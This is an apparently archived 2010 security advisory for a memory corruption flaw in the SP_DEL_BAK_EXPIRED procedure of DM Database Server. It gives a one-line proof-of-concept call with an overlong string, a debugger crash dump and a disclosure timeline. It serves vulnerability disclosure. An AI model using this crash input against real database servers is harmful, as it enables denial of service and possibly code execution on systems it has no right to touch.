AOH :: HP Unsorted D :: B1A-1167.HTM

DM Database Server Memory Corruption Vulnerability



DM Database Server Memory Corruption Vulnerability
DM Database Server Memory Corruption Vulnerability



DM Database Server Memory Corruption Vulnerability=0D
=0D
=0D
Vulnerable:	All Version=0D
Vendor:		www.dameng.com=0D 
Discovered by:	Shennan Wang (HuaweiSymantec SRT)=0D
=0D
=0D
Details:=0D
==========0D
A vulnerability in DM Database Server all version allows attacker to execute arbitrary code or cause a DoS (Denial of =0D
=0D
Service).Authentication is required to exploit this vulnerability.=0D
=0D
The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.=0D
=0D
=0D
POC: =0D
==========0D
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');=0D
=0D
=0D
=0D
(458.5fc): Access violation - code c0000005 (!!! second chance !!!)=0D
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c=0D
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0         nv up ei pl zr na pe nc=0D
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246=0D
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll=0D
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\dmdbms\bin\wdm_dll.dll - =0D
wdm_dll+0xd1753:=0D
100d1753 f2ae            repne scas byte ptr es:[edi]=0D
0:009> da ebp=0D
074ed1fc  "AAAAAAAAAAAAAAAAAAAA"=0D
=0D
=0D
=0D
Timeline:=0D
=========0D
2010.04.17   Report to vendor,no response.=0D
2010.05.31   Public=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.